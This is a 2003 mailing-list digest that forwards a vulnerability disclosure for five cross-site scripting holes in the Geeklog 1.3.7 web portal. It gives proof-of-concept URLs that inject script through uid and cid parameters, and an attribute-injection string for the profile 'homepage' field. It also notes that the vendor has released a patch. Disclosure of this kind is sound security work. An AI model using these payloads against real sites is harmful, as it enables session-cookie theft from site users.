[Please upgrade if you use Geeklog -- Raju] This is an RFC 1153 digest. (1 message) ----------------------------------------------------------------------
Message-ID: <[EMAIL PROTECTED]> From: snooq <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: Multiple XSS in Geeklog 1.3.7 Date: 14 Jan 2003 02:43:01 -0000 nothing new. typical XSS bugs. summary ======= Geeklog is a web portal system written in PHP. There exists 5 XSS holes in the software. the 'holes' =========== --1-- http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script> --2-- http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script> --3-- http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script> --4-- http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script> --5-- 'homepage' field in the user's account information page is not sanitised properly. As a result, javascript can be injected by setting the 'homepage' field like this: http://url"; onmouseover="alert(document.cookie) ** 3) & 4) were found by Dirk Haun of Geeklog Team. vendor status ============= 03/01/2003 contacted Dirk Haun of Geeklog team 14/01/2003 Geeklog 1.3.7sr1 was released. New version closes all holes found. --==snooq==-- ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ It is the mind that moves ================================================ To unsubscribe, send email to [EMAIL PROTECTED] with unsubscribe in subject header. Check archives at http://www.mail-archive.com/ilugd%40wpaa.org
